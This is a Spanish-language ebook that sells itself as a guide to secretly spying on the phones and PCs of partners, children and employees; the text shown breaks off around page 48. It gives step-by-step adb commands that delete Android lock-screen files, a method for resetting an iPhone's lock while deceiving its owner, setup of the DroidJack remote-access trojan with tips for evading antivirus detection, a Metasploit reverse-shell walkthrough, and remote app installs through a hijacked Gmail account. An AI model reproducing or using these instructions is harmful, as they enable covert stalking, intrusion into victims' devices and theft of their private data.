Вы находитесь на странице: 1из 108

Espiar Cualquier Celular y PC Totalmente

Gratis

Método Espía Especial

Espiar Cualquier Celular y PC Totalmente Gratis ©

Page | 1
Estrategias Avanzadas Para Espiar Celulares: La Guía Paso por Paso de Espionaje Altamente
Efectivo, ©2015 Todos Los Derechos Reservados. Advertencias: Al continuar leyendo este libro
electrónico, usted declara que es mayor de 18 años y que es legal leer y poseer este material en su
país y/o jurisdicción. Usted acepta y está de acuerdo al leer esta información que el autor, el
editor, el propietario, accionistas, afiliados y empleados de Exur, S. A. y de Comoespiarmoviles.net
no aceptan o asumen ninguna responsabilidad o compromiso por el uso indebido o abuso de del
contenido de este libro electrónico y expresamente se desligan de todas las garantías implicadas.
Este libro electrónico está hecho para fines educativo. Exur, S. A. no garantiza que el documento o
información esté libre de errores, ajustada a su propósito cumplirá cualquier criterio en particular
por el desempeño o la calidad.

Page | 2
Tabla de contenido
Métodos de Desbloqueo de Patrón de Seguridad para
Smartphones
Desbloquear pantalla de seguridad Android no rooteado (Página 7)
Desbloquear pantalla de seguridad Android rooteado (Página 17)
Desbloquear pantalla de seguridad iPhone (Página 20)
Guardar copia de seguridad iOS en iCloud (Página 26)

Guardar copia de seguridad iOS en iTunes (Página 27)

Métodos de Espionaje para Android


DroidJack (Página 29)
Hackear móvil Android Kali Linux (Página 35)
Lost Android (Página 46)
Cell Tracker (Página 55)

Métodos de Espionaje para Iphone


Tutorial TaiG Jailbreak para iOS (Página 57)
Ejecutando Android en iPhone (Página 60)
Mobipast (Página 63)
BosSpy (Página 71)

Métodos de Espionaje para PC


Livesnoop (Página 77)
Revealer Keylogger Free 2.0 (Página 82)

Métodos de Phishing (Hack de correos y contraseñas)


Tutorial (Página 85)

Métodos anti-espionaje
Anti-Spy Mobile Free (Página 91)

Page | 3
Rooteo de Android (Acceso Root)
Tutorial King Root (Página 92)

Apéndice: Software y Términos


Cydia (Página 97) Jailbreak
(iOS) (Página 103) iDroid
(Página 104) Kali Linux
(Página 105) Spyware
(Página 105) iCloud (Página
105)
iTunes (Página 105) ADB
(Página 106)
Metasploit (Página 106)
WinRar (Página 106)

Programa Para Espiar Móviles DroidJack

Véase La “Página 29” Para Ver el Tutorial.


Page | 4
Introducción
Quizás le parezca un poco exhaustiva y larga toda esta información, pero permítame decirle que no
necesitará todo lo que está escrito aquí. Esta guía está divida en diferentes tipos de estrategias
para darle la comodidad y libertad de elegir la que necesite. Este video de introducción le ayudará
a entenderlo mejor: http://mfi.re/watch/4625lyhrxlqd46a/Introducción_Spy.mp4

Este material instructivo está diseñado para que se libere fácilmente de las dudas y tenga paz
mental con asuntos relacionados con la familia, los negocios y la vida amorosa, ya que gracias a la
excelente decisión que ha tomado al elegir este magnífico libro electrónico, tendrá la oportunidad
de ver por usted mismo(a) lo que realmente hacen sus hijos, sus empleados y su pareja a través de
un monitoreo constante de sus celulares y computadoras. Y todo esto de manera increíblemente
fácil. De hecho, este libro está hecho mostrando cada paso con imágenes de qué hacer en cada
ocasión, brindándole así un servicio personalizado de antemano; es por esto que puede estar
totalmente seguro(a) de que sus dudas terminan aquí sin importar cuál sea su nivel académico, ya
que los pasos son tan sencillos que hasta un niño de 4 años de edad puede seguirlos.

En este contenido trataremos diversos temas de diversas aplicaciones y tecnología que hacen
posible el espionaje efectivo de celulares y computadoras, y lo mejor de todo, que es 100% Gratis!
No tendrás que pagar un centavo para adquirir los programas ni las aplicaciones, aunque hay
algunas funciones que están a opción suyas si comprarlas, pero le aseguro que con solo la versión
gratis será más que suficiente, ya que no tendrá límite de tiempo en la libertad de sus acciones y
logrará la paz mental que necesita.

Los requisitos para cada estrategia serán explicados en cada lección. ¡Tenga una magnífica
expedición!

Page | 5
Métodos de Desbloqueo de Patrón de
Seguridad para Smartphones
En esta parte aprenderemos cómo desbloquear las pantallas de seguridad para ingresar a la
mayoría de dispositivos, incluyendo teléfonos Androids Rooteados como Androids no Rooteados.
También para las diferentes versiones de iPhone.
Obviamente si queremos ingresar al móvil de la víctima, necesitamos alguna estrategia. Ya sea
esperar a que se descuide y deje el celular desbloqueado, o… algo mucho mejor XD, Muahahaha!
Si tomamos el celular de la víctima, en la mayoría de los casos, como tú mismo sabrás si usas
Smartphone, nos encontremos con molestas pantallas de seguridad como las siguientes:

Page | 6
Existen patrones de seguridad por huellas dactilares.

Entre otros patrones. La verdad es que todos estos patrones pueden ser burlados con los
siguientes métodos que aprenderás a continuación.

 Desbloquear pantalla de seguridad Android (no rooteado):

Ahora aprenderá cómo desbloquea cualquier pantalla de un celular Android no rooteado con un
programa de Hackeo, que será llave fundamental para conseguirlo.

Requisitos

• Android de la víctima en mano, tiene que ser un android no rooteado.


• Un ordenador dónde instalar el programa ABD
• Instalar el programa ABD en el ordenador
• Conectar el Android a la PC vía USB y seguir los procedimientos a continuación
• La opción “USB Debugging” (Depuración USB) debe estar habilitada

Dónde conseguir el programa


Este link te servirá para descargarlo:
https://docs.google.com/uc?authuser=0&id=0B0MKgCbUM0itNVB1elljU2NPR0k&export=download
Esta es una versión más antigua, por si la de arriba no te funciona:
https://docs.google.com/uc?authuser=0&id=0B0MKgCbUM0itSUhpUklCTFpzWkE&export=download Estas

son descargas automáticas, basta con solo poner el link y comenzará a descargarse.

Page | 7
 Instalación de Drivers ADB

Los drivers ADB son las configuraciones que permitirán la instalación del programa ADB, los pasos
de instalación son muy sencillos.

Paso 1: Descargamos los ADB Drivers del Link ya mencionado.

Paso 2: Abrimos el instalador en la carpeta descargada, como vemos a continuación.

Paso 3: Digitamos “y” en la terminal que nos aparece. Pulsamos Enter.

Page | 8
Paso 4: Nos pide confirmación nuevamente para otra instalación, pulsamos “Y” y Enter.

Paso 5: Seguimos con lo mismo, pulsamos “y” de nuevo para confirmar.

Paso 6: Nos aparecerá un resultado que dice “Installing… driver”. Aparecerá una pestaña de
instalación, pulsamos siguiente y finalizamos la instalación. Y ya tendremos instalado el ADB. En
caso de que no funcione puedes buscar ayuda en la misma página donde lo descargaste. Para
comprobar si ya está listo, solo abrimos una terminal y ponemos “adb”, el resultado mostrará todo.

Page | 9
 Ejecución de ADB

Paso 1: Procedemos a conectar el cable USB desde la PC al dispositivo, estando bloqueado. Como
ahora.

Paso 2: Ejecutamos el programa después de haberlo extraído


de la carpeta descargada. Ejecutamos en una terminal, tan
solo escribiendo “cmd” en el buscador de Windows nos
aparecerá nuestra línea de comandos, click y abrimos nuestra
terminal.

Paso 3: Una vez abierta, nos aparecerá una terminal como esta, en la cual pondremos nuestras
líneas de comandos para desbloquear el dispositivo. Lo primero que debemos digitar es el
comando “adb shell”.

Page | 10
Paso 4: Digitamos el siguiente comando en la terminal: “rm /data/system/gesture.key” como
puedes ver a continuación. Pulsamos “Enter” para ingresarlo. De esta manera la seguridad queda
desbloqueada. Ahora, lo que debemos hacer es sencillamente reiniciar el dispositivo para que haga
efecto.

Paso 5: El siguiente paso es ingresar el comando: adb Shell y luego # reboot para reiniciar.
Pulsamos “Enter” una vez más.

Inmediatamente después de haber escrito el comando, el dispositivo comienza a reiniciarse. Esto


es buena noticia. Esperamos a que termine el reinicio.

Page | 11
Paso 6: Una vez terminado el reinicio, la operación habrá sido un éxito. Ahora ponemos cualquier
patrón y la pantalla se desbloqueará. Sin importar cuán ridículo sea, cualquier cosa que intentemos
violará la seguridad. Como ves en la siguiente imagen y la que le sigue.

Existe la posibilidad de que este método no le funcione, ya que puede funcionar para una
determinada cantidad de modelos Android. Por eso existe otra estrategia alterna a ésta, que es la
siguiente.

Page | 12
 Opción #2

Este es un camino más largo, pero si el primer método te falló, este es el que debe funcionarte.
Digitamos “adb shell” y luego el comando que puedes ver debajo, “cd
/data/data/com.android.providers.settings/databases”.

Luego digitamos: “sqlite3 settings.db”.

Después de digitar lo anterior, nos aparecerá un resultado como el siguiente. Luego ponemos el
siguiente comando: “update system set value=0 where name=’ lock_pattern_autolock’ ;”.

Seguimos con el comando: “update system set value=0 where name=’


lockscreen.lockedoutpermanently’ ;”

Luego digitamos sencillamente “.quit”. Y ya todos estará resuelto, reiniciamos y el patrón se


romperá sin importar lo que ingresemos.

Aquí ya tenemos el celular desbloqueado. Pero no debemos dejarlo sencillamente así. Lo más
recomendable sería ir a cambiar la configuración de seguridad para añadirle un nuevo patrón de
Page | 13
desbloqueo, cambiando el estilo, le ponemos uno que solo tengamos mover un ícono para abrirlo.
Esto debemos hacerlo para que sea menos notable para la víctima que su celular haya sido
hackeado, aunque obviamente se puede dar cuenta de que ese no era su patrón de desbloqueo.
En este caso debemos dejarle en patrón de desbloque más sencillo, de esa manera, la víctima
puede llegar a pensar que sencillamente el celular tuvo algún error técnico y lo más probable es
que lo deje así, ya no que no presentará ningún otro inconveniente.
Lo más probable es que la víctima cambie su patrón nuevamente a uno más seguro. Esto no
importa, porque ya para ese entonces habremos instalado nuestra aplicación espía al teléfono de
la víctima. Sin importar lo seguro que sea su patrón, ya el daño está hecho y no le servirá de nada.
De ahí en adelante la información del teléfono irá hacia nosotros automáticamente, trayendo
consigo la información de contactos, mensajes, llamadas, grabación de llamadas, datos
multimedia, etc. La información del celular queda bajo nuestro dominio, donde será enviada por
internet a nuestro correo electrónico, o a la página oficial de la aplicación, dependiendo de cuál
aplicación instalemos en el teléfono de la víctima.

Ahora bien, también tenemos la opción de sencillamente violar la seguridad para instalar la
aplicación espía, ocultarla, y luego desconectar el dispositivo del teléfono; lo cerramos y cuando lo
volvamos a abrir en patrón de seguridad seguirá estando ahí, como si nada hubiese pasado.
Probablemente esta sea la mejor opción en la mayoría de los casos, pero en realidad todo
dependerá de las circunstancias. Es usted quien debe determinar de qué manera le conviene más.

No volveremos a necesitar acceso físico al teléfono de la víctima nunca más.

Page | 14
Paso 7: Vamos a las configuraciones, pulsamos “Settings”.
Ya sea en el escritorio como en el menú general. Debe
aparecernos esto. Con símbolo de llave o rueda mecánica.

Paso 8: Vamos a “Security” o Seguridad en


español en el menú que aparece.

Paso 9: Pulsamos donde dice “Screen Lock”, o


Bloqueo de Pantalla para elegir un nuevo patrón.

Page | 15
Paso 10: Elegimos el patrón llamado “Slide” o de
Deslizamiento. Con el cual la víctima podrá abrir
su teléfono deslizando el ícono del candado en la
pantalla inicial.

Page | 16
 Desbloquear pantalla de seguridad Android (rooteado):

En esta parte aprenderemos a desbloquear la pantalla de seguridad de Androids rooteados.

Requisitos

• Android de la víctima en mano, tiene que ser un android “rooteado”.


• Un ordenador dónde instalar el programa ABD
• Instalar el programa ABD en el ordenador
• Conectar el Android a la PC vía USB y seguir los procedimientos a continuación La opción
“USB Debugging” (Depuración USB) debe estar habilitada.

Dónde conseguir el programa


Este link te servirá para descargarlo: http://www.mediafire.com/download/s189hjjcn31gc16/adb+%281%29.zip

Paso 1: Conectamos el dispositivo android bloqueado a la PC vía USB. Procedemos a abrir la


carpeta del programa “adb” una vez haya sido extraído de la carpeta comprimida descargada.

Paso 2: Pulsamos las parte donde dice


“Open command window here” (Abrir
comando aquí).

Page | 17
Paso 3: Escribimos el comando: adb devices en la nueva terminal que se abrirá, cómo la siguiente.
Esto sirve para mostrar todos los dispositivos android que estén conectados a la PC; en este caso,
solo uno.

Paso 4: Escribimos el siguiente comando en la terminal, como vemos en esta lista, el número 2.
Pulsando “Enter”.

Paso 5: Ingresamos el comando que sigue en la lista y “Enter”. El comando cd data/system sirve
para convertir los patrones de seguridad en datos leíbles para el sistema.

Page | 18
Paso 6: Continuamos con el siguiente comando de la
lista. Con el cual podremos habilitar la función de Super
Usuario.

Lo ponemos en la terminal como siempre lo


hemos hecho.

Paso 7: Finalizamos con el último comando. En cual eliminará del teléfono todos los datos de
seguridad, permitiendo así la entrada fácil.

Cuando mires el teléfono, todavía tendrá el patrón. No hay de qué preocuparse, pulsa cualquier
patrón y se desbloqueará inmediatamente, sin importar cuál sea. Ya que ya no cuenta con registros
de seguridad. Entonces procedemos a instalar la aplicación espía que más le convenga, que más
adelante le mostraremos una buena cantidad de ellas que realmente funcionan. Puedes dirigirte a
la sección “Métodos de espionaje para android”.

Page | 19
 Desbloquear pantalla de seguridad iPhone:

Ahora aprenderás cómo desbloquear cualquier pantalla de seguridad iPhone, guardando nuestros
datos en la base de datos iTunes y reiniciando el teléfono sin perder la información. La víctima no
notará que eso sucedió con su teléfono. Pero se corre el riesgo de perder todos los datos en caso
de que no tengamos acceso a la PC de víctima, donde debería estar instalado el programa iTunes.
Por eso le sugiero que siga los pasos con sumo cuidado. No nos hacemos responsables de sus
errores.

Requisitos

• iPhone de cualquier modelo


• Un ordenador con iTunes instalado (Muy preferiblemente que sea el ordenador de la víctima)
• Conectar el iPhone a la PC vía USB y seguir los procedimientos a continuación

Bien, comencemos, probablemente tendremos una pantalla de


seguridad como esta.

Paso 1: Apagamos el iPhone normalmente.

Page | 20
Paso 2: Mantenemos pulsado el botón de inicio.

Paso 3: Mientras lo mantenemos pulsado, conectamos


el cable USB. Esto activa el modo recuperación.

A continuación nos aparecerá una imagen como esta, indicando con el


símbolo de iTunes que el iPhone está conectado vía USB.

Aparecerá en la pantalla el en siguiente mensaje: “iTunes has detected an iPhone in recovery


mode…” (iTunes ha detectado un iPhone en modo recuperación…) Pulsamos ok.

Page | 21
Paso 4: Pulsamos el botón “Restore iPhone”

Paso 5: Aparecerá una pantalla de confirmación en la se nos da dos opciones, pulsamos la que dice
“Restore and Update”.

Una vez presionamos “Restore and Update”, nos aparecerá una barra en la parte de arriba de la
pantalla indicando la extracción de software que se instalará en el iPhone.

Page | 22
También en el iPhone aparecerá la barra de
progreso.

Esperamos a que termine de cargar…

Una vez termine de cargar completamente aparecerá una pantalla de confirmación de lo ya


logrado que dice: “Your iPhone has been restored to factory settings”. Pulsamos OK.

En el teléfono comenzaremos a recibir los saludos de inicio…

Page | 23
Paso 6: Habilitamos los servicios de locación o lo deshabilitamos.

Paso 7: Esta es una parte fundamental del proceso, ya que si lo


hacemos mal podríamos borrar totalmente la información
almacenada en el dispositivo. Vemos 3 opciones, la primera para
restaurar el teléfono como de fábrica, la segunda es para
restaurar desde iCloud y la tercera desde iTunes. Podemos
restaurar la información que de por sí pertenece al teléfono
eligiendo una de las dos últimas, la que hayamos elegido
anteriormente para hacerlo. Eso sí, debemos estar en la PC de la
víctima donde el iTunes está instalado en caso de que queramos
hacer la recuperación. En caso de que no quieras hacer la
recuperación y dejarlo de fábrica para luego hacerte el tonto y
decir a la víctima que no sabes lo que sucedió con su teléfono (lo
cual es una opción, XD), entonces procedemos a elegir “Set Up as
a New iPhone”.

Page | 24
Si quieres crear un Apple ID puedes crearlo, pero no lo recomiendo
si es el teléfono de la víctima, puede arruinar toda la operación. Lo
mejor es que lo saltemos pulsando Skip This Step.

Paso 8: Pantalla para crear contraseña. Puesto que


estamos en el celular de víctima no creamos ninguna
para que no sospeche. Pulsamos la opción debajo “Don’t
Add Passcode”.

El teléfono funcionará normal de ahí en adelante. Lo único


que la víctima notará es que el patrón de seguridad ya no
está, y lo más seguro es que sencillamente lo vuelva a
configurar en medio de la confusión. Asumiendo así que la
víctima no sospeche de ti. Entonces, una vez desbloqueado,
ya podemos instalarle la aplicación espía de nuestra
elección. Las aplicaciones las conocerá más adelante en las
próximas lecciones.

Page | 25
 Guardar copia de seguridad iOS en iCloud:

Es de suma importancia guardar una copia de seguridad de todos los datos


del teléfono antes del proceso, de esta manera nos aseguramos de no perder
nada.
Para hacer una copia de seguridad en iCloud hacemos lo siguiente:

1. Conecte el dispositivo a una red Wi-Fi.


2. En iOS 8 o posterior, vaya a Settings> iCloud> Backup.
3. En iOS 7 o anterior, vaya a Settings> iCloud> Storage and
Backup. 4. Asegúrese de que “iCloud Backup” esté encendida en la
pantalla que le aparece.

5. Toque “Back Up Now". Mantente conectado a tu red Wi-Fi hasta que el proceso se complete.
6. Asegúrate de que la copia de seguridad haya terminado tocando Settings> iCloud> Storage>
Manage Store, y seleccione su dispositivo. La copia de seguridad que acaba de hacer debe
aparecer en los detalles con su respectivo tiempo y tamaño.
De esta manera ya no tendremos que preocuparnos en caso de que algo salga mal.

 Back Up automático iCloud

Después de haber activado la copia de seguridad de iCloud, iCloud puede automáticamente hacer
un Back UP de tu dispositivo cada día. iCloud ejecuta estas copias de seguridad automáticas diarias
sólo si:

• El dispositivo está conectado a una fuente de


alimentación.
• El dispositivo está conectado a una red Wi-Fi.
La pantalla de su dispositivo está
bloqueado.

Page | 26
 Guardar copia de seguridad iOS en iTunes:

1. Abre iTunes y conecta el dispositivo al ordenador.


2. Guardar el contenido que has descargado desde la tienda de iTunes o App Store haciendo clic en
File> Devices> Transfer Purchases. Si utilizas Windows y no ves un menú “File”, pulsa la tecla Alt.

Espere a que iTunes termine la transferencia de sus compras. A continuación, haga clic en Files>
Devices> Back Up. Si utiliza Windows y no ver un menú Archivo, pulse la tecla Alt.

Page | 27
Después de que termine el proceso, se puede ver si la copia de seguridad ha finalizado
correctamente, haga clic en Preferencias de iTunes> Dispositivos. Debes ver el nombre de tu
dispositivo con la fecha y hora que iTunes haya creado la copia de seguridad.

Page | 28
Métodos de Espionaje para Android
Esta sección está dedicada a los métodos infalibles para espiar celulares Android. Todo explicado
en todo detalle en lenguaje sencillo para asegurarnos de que lo comprenda a plenitud y pueda
comenzar su espionaje efectivamente.

 Hackear móvil Android con DroidJack:

A continuación le mostraremos el video tutorial que le enseñará paso por paso, asegurándonos de
cubrir todas las áreas pertenecientes a estos procedimientos. Cada punto será explicado de forma
detallada.

Este es el enlace de descarga DroidJack V4.4:

https://mega.nz/#!9D4EmDQL!4sidmwWiiZZ5RNW07O1Q7dcqJVGp6rjw9E_gfcvcdVY

Para descargar el archivo correcto en Mega, debemos pulsar el botón “download with browser”
(descargar con navegador), que es el botón gris, como lo muestra esta imagen. (No pulse el botón
rojo).

Este es el enlace de descarga DroidJack V3:


https://mega.nz/#!W0pEEZpJ!JdtRKwHhj19O9Aac_RsFaJMiIFnugDLbh0MZyAwYUU8

Page | 29
Recordatorio!

Debe tener Java instalado o actualizado para poder ejecutar este


programa. La siguiente imagen muestra la página oficial donde
podrá descargar o actualizar su versión de Java. Si no se asegura
de eso, puede que el archivo no se ejecute:

Este enlace a continuación le va a redirigir al video tutorial completo del programa DroidJack:
https://vimeo.com/140975899

Le pedirá una contraseña para verlo, la contraseña es: “metodoespia-2015”

Cualquier duda, pregunta o problema, por favor contacte al Soporte al Cliente en


este enlace: http://support.comoespiarmoviles.net/soporte/

 Instrucciones Escritas y Detalladas, preguntas frecuentes

DroidJack v4.1 – Herramienta de Administración Remota Android

Autor:
--------
Page | 30
L.R Sanjeevi (c) 2015.
Actualizaciones de la versión 3.3:
-----------------
* Lector de WhatsApp – Para dispositivos root solamente.
* Activación por llamada – Activa la conexión de internet en dispositivos desconectados con solo
llamar desde un número en específico.
* Cambiador de íconos – Puedes cambiar el ícono de su APK en el APK Generator.
* Reset DroidJack Server – Reinicio del servidor DroidJack para mejorar la eficiencia si es necesario.
* Reset Data Transfer port – En caso de cualquier inconveniente, use esta opción para reiniciar el
puerto de transferencia.
* Nota personal – Una nota para guardar cualquier información personal del dispositivo.
* Se corrigieron errores del Remote Eyes entre otros bugs menores.

Instrucciones de configuración:
--------------------
1) Registrar un DNS dinámico de no-ip o dnsdynamic.com
2) Elegir un puerto (Ejemplo: 1337), redirigir el puerto elegido (1337) y el puerto 1334 (por
defecto), por lo cual necesitas abrir 2 puertos!
3) Generar la APK con el puerto elegido (1337) y su DNS dinámico, entre otros detalles!
4) No escané su aplicación generada en la página Virustotal.com, para que pueda mantenerse
indetectable por más tiempo.

Tutorial detallado:
-------------------
Conectividad WAN (Via Internet)
-------------------------------
1) Entre su dirección no-ip en la casilla Dynamic DNS y su puerto (Ejemplo: 1337) en la casilla “port”
mientras se genera la aplicación.
2) Actualice el no-ip usando el no-ip DUC.
3) Abra el puerto elegido (1337) y el puerto por defecto 1334 (ambos en protocolo TCP y UDP).
********************* Pasos opcionales *********************
4) Active el puerto 1334 (por defecto) en el DroidJack, en la sección “Devices”.
5) Verifique si el puerto 1334 (default) está abierto haciéndole un escaneo en este enlace
http://www.whatsmyip.org/port-scanner/. (También verifique si el puerto 1334 (default) se
muestra abierto aún si no lo estamos usando con el DroidJack. Esto es solo para asegurarnos de
que ningún otro software esté usando el puerto por defecto 1334.
**********************************************************
6) Active el puerto (1337) en DroidJack.
7) Verifique si el puerto elegido (1337) está abierto. (Verifique también si el puerto 1337 se
muestra abierto cuando su conexión NO ha sido habilitada en el DroidJack. Esto es solo para
asegurarnos de que ningún otro software esté usando el puerto elegido (1337).
Page | 31
8) Instale la aplicación en su teléfono y ábrala.
9) Conecte el móvil víctima vía data móvil o a cualquier otro WiFi alrededor de mundo.

Connectividad de su Red de Área Local (LAN)


-----------------
1) Entre la dirección LAN IPV4 de su computadora (Digite “ipconfig” en una terminal de comandos y
use la IP versión 4) en la casilla “dynamic DNS” and su puerto elegido (Ejemplo: 1337) en la
casilla “port” mientras generamos la APK.
2) Escuche el puerto elegido (1337) en DroidJack.
3) Asegúrese de que ningún otro software esté usando el puerto (1337) ni el puerto 1334 (por
defecto).
4) Instale la aplicación en su teléfono y ábrala.
5) Conectese a su misma LAN (Red de área local) donde su computadora está conectada vía WiFi o
cableado.

Preguntas Frecuentes:
-------

1) No puedo ingresar a la aplicación!


Resp) Verifique que su PC no esté lenta o sobrecargada. Si es necesario un reinicio, reiníciela.

2) Soy capaz de loguearme pero la aplicación se minimiza!


Resp) Cierre la aplicación y ábrala después de 15 minutos. Si el problema persiste por mucho
tiempo, elimine su IP y tome una nueva (Esto se hace reiniciando el router de su fuente de
electricidad por unos segundos o usando cualquier VPN).

3) No estoy teniendo la conexión con el dispositivo, aun asegurándome de haber producido bien
la aplicación!
Resp) Verifique si está tratando de conectarse en su misma red local o de otra conexión y siga el
tutorial que corresponde con el procedimiento que quiere hacer. Si el problema persiste entonces
desactive su firewall o añada una excepción en el firewall.

4) Tengo conexión con el dispositivo pero ninguna de las características funcionan!


Resp) asegúrese de que el puerto (1334) esté abierto tanto para TCP como UDP y asegúrese de que
ninguna otra aplicación esté usando ese puerto. Siga el tutorial de nuevo.

5) He usado el modo “Stealth” pero la aplicación sigue siendo visible!


Resp) La aplicación debe ser abierta al menos una vez, entonces automáticamente el ícono se
ocultará. En algunos dispositivos, después de un reinicio el ícono desaparecerá.

Page | 32
6) Estoy teniendo un error cuando intento ligar la aplicación con un juego o de otro tipo!
Resp) Intente mezclar el virus con otra aplicación o juego. Algunos juegos o aplicaciones están
diseñados para auto-escanearse y no permiten la mezcla.

7) He mezclado el virus con otra aplicación que funciona bien pero no obtiene la conexión!
Resp) Una vez que la aplicación mezclada es instalada e abierta, el dispositivo necesita
desconectarse del internet y conectarse de nuevo, entonces ahí se conectará al cliente.

8) Puedo usar un puerto diferente que no sea el 1334 (puerto por defecto)?
Resp) No. El puerto 1334 es el que debe estar abierto solo para el DroidJack.

9) Los números de teléfono de los dispositivos se muestran como "Not Registered"!


Resp) Eso es porque el número de teléfono no está registrado con el dispositivo. Por lo cual no es
accesible vía API.

10) Cómo se calcula el tiempo de inactividad?


Resp) Cuando la pantalla del dispositivo se apaga.

11) No puedo subir archivos al teléfono!


Resp) Verifique si tiene permiso de escritura en ese folder. Puede darse cuenta seleccionando el
folder.

14) How to open an app using the App Manager?


Resp) Haga doble click en el ícono para abrir la aplicación en el dispositivo.

15) Cómo obtener la localización GPS actual?


Resp) Use la función "Current GPS". Después de un rato pulsamos la función "Last Checked In".
Puede tomarse mucho tiempo si el teléfono no se está moviendo o si está en un país donde el GPS
no es lo suficientemente bueno.

16) Remote Eyes no está funcionando o dura demasiado!


Resp) Durante el primer uso de Remote Eyes usted necesita poner la calidad primero en las
configuraciones de dicha función: “Settings”.

17) Cómo usar la función Update/Install?


Resp) Necesita subir la APK a un host con un link de descarga directa y pegar el link en la casilla.

18) La conexión entre mi cliente y el dispositivo está lenta!


Resp) Use la función "Reset DJ Server".

Page | 33
19) Algunas características estaban funcionando pero despúes de abrir una de ellas se congeló, y
después de eso ninguna otra característica funciona!
Resp) Reinicie el puerto de transferencia haciendo click en la etiqueta "Status:" (Cerca de la casilla
que dice: “port number”, ahí aparecerá la etiqueta llamada saying "Status:".

20) Qué tipo de nombres son permitidos en la función "Change Package Name"?
Resp) El paquete debe estar escrito en minúsculas. Solo puede contener letras y números. Puede
tener un punto entre palabras pero no al principio ni al final. (Ejemplo: El nombre del paquete
puede ser "hello.world" pero no "hello.world.”

Page | 34
 Hackear móvil Android con Kali Linux y Metasploit:

En este tutorial aprenderemos a hackear cualquier móvil Android usando las consolas msfpayload y
msfconsole en Kali Linux. Esto debe instalarse un su PC, no en la PC de la víctima. No necesita
acceso físico al celular de la víctima para hackearlo.

Requisitos:
Kali software en el sistema operativo Linux (solamente).
Framework Metasploit actualizado.

 Características fundamentales

Espionaje de actividad del sistema, incluyendo manejo e instalación de aplicaciones.


Paso 1: Ejecutamos el siguiente comando en una terminal vacía de Kali Linux.

Una vez insertado este comando, le aparecerá en la pantalla este resultado:

Page | 35
Paso 2: Ponemos “ls” en la línea de comandos e ingresamos.

Ahora el archivo ya se ha creado, entonces solo debemos enviar el archivo a la víctima y tendrá que
instalar ese archivo de aplicación en su celular android.

Paso 3: Pero antes de eso, para aceptar conexiones, necesitamos ir a “msfconsole”, digitando:
“msfconsole” en una nueva terminal:

Page | 36
Tomará algo de tiempo, esperamos pacientemente… Luego aparecerá una pantalla similar a esta:

Paso 4: Ya lo tenemos, entonces en esa nueva terminal que aparece, la “msfconsole”, vamos a
buscar el multihandler. Ponemos la siguiente línea de comandos: “search multi/handler” de la
siguiente manera.

Page | 37
Pulsamos “Enter” y nos aparecerá el siguiente resultado:

Paso 5: Entonces a continuación debemos digitar “Use exploit/multi/handler”.

Page | 38
Paso 6: Configuramos el “payload” que habíamos tomado en “msfpayload”
(android/meterpreter/reverse_tcp), entonces insertamos “set PAYLOAD
android/meterpreter/reverse_tcp” y la terminal se verá como la siguiente:

Y ya el “payload” está configurado.

Paso 7: Ponemos las opciones como LHOST y LPORT (la misma que hemos dado en “msfpayload”).
Para eso ponemos “show options”.

Podemos ver que el LPORT ya está ahí con su valor.

Page | 39
Paso 8: Ahora solo debemos cambiar el LHOST. (Si es que en su pantalla no le aparece, lo puede
configurar manualmente). Podemos utilizar el siguiente comando: “set LHOST 192.168.0.121”.

Una vez hecho esto, el valor para LHOST ya fue definido. Podemos digitar nuevamente “show
options” para ver los nuevos valores de LHOST y LPORT.

Page | 40
Paso 9: Digitamos “exploit” y aparecerá algo como esto. En la segunda línea de los resultados
veremos: “Starting the payload handler…”

Ahora todo ya está configurado. Solo esperamos a que la víctima cliqué en el archivo que creaste.
Una vez caiga en la trampa, recibirás una conexión “meterpreter”. La terminal se verá como la
siguiente:

Como puedes ver, ahora cuentas con una sesión “meterpreter”.

Page | 41
Para más información de lo que hemos hecho, digitamos en comando “sysinfo”. Vemos que el
resultado en OS narra una unión entre Linux y Android.

Si a continuación ingresamos el símbolo de interrogación “?” vemos a la siguiente información:

Si ponemos “Ifconfig”, revelará las interfaces:

Page | 42
Para revelar la información contenida en el android, ponemos los siguientes comandos en orden:
“pwd” luego “cd..” seguido de “cd /” y “ls”. Como en la siguiente imagen:

De esta manera hemos obtenido un árbol completo de archivos como la siguiente:

Page | 43
Paso 10: Ingresamos a la tarjeta SD con los comandos: “cd sdcard” y “ls” como la siguiente imagen:

Luego ponemos “cd download” y “ls” seguido…

Page | 44
… y podemos ver las aplicaciones que ese individuo ha descargado.

Podemos incluso hacer modificaciones en el teléfono de la víctima.

 Dónde descargar el programa

En la página oficial Kali.org de manera gratuita.

Page | 45
 Lost Android:

Esta maravillosa aplicación fue diseñada con el propósito de ayudarte a encontrar el dispositivo
perdido o robado sin importar en qué parte del mundo se encuentre.

 Características fundamentales

Todas estas funciones se hacen remotamente a través del internet.


* Leer mensajes enviados y recibidos
* Limpiar el teléfono
* Bloquear teléfono
* Borrar Tarjeta SD
* Localizar mediante GPS o red
* Iniciar alarma con pantalla parpadeante
* Enviar SMS desde la página web
* Mensajes emergentes
* Re-direccionar Llamadas
* Estado del teléfono: batería, imei, etc
* Alarma SMS a distancia
* Bloqueo de y desbloqueo de la mensajería remotamente
* Borrado remoto de tarjeta SD por SMS
* Borrado de memoria de teléfono vía SMS
* Control remoto APN vía SMS
* Inicio / parada de GPS
* Inicio / parada de WIFI
* Mantenerse en actividad oculta frente al lanzador
* E-mail se te envía cuando se cambia la tarjeta SIM
* Obtener lista de llamadas
* Tomar fotos con cámara frontal
* Tomar fotos con la cámara trasera
* Hacer que el teléfono hable con conversión de texto a voz
* Comando de texto
* Comando hablar SMS
* Bloqueo de Tiempo de espera
* Restaurar la configuración de arranque
* Grabar sonidos desde el micrófono
Page | 46
* Iniciar y detener la conexión de datos vía SMS
* Iniciar y detener la conexión WIFI vía SMS
* Recaudar el contenido del navegador

La aplicación no hace ningún sondeo a servidores externos, así que no hace gastos extras de
batería.

 Tutorial Lost Android

En caso de que ya hayamos hackeado la cuenta de Gmail de la víctima, podemos tomar esa misma
cuenta para ingresar como cuenta de Google en cualquier computadora o dispositivo. De esta
manera, con la cuenta de Gmail de la víctima, podemos instalar libremente cualquier aplicación de
manera remota, sin importar en qué país la víctima esté.
Paso 1: Solo debemos 1) Ingresar con la cuenta, 2) Poner en el buscador el nombre de la aplicación,
3) Instalar la aplicación pulsando el botón instalar que aparece en verde. Una vez hecho esto, la
aplicación comenzará a instalarse remotamente vía internet en el celular de la víctima, sin avisarle
ni confirmar nada.
(En caso de que tenga el celular en mano, puede romper la seguridad de bloqueo e instalar la
aplicación manualmente).
La imagen siguiente muestra cómo se instalaría remotamente.

Page | 47
La víctima recibirá una notificación como ésta que dice “Lost
Android” (pie de página), por la cual quizás comience a
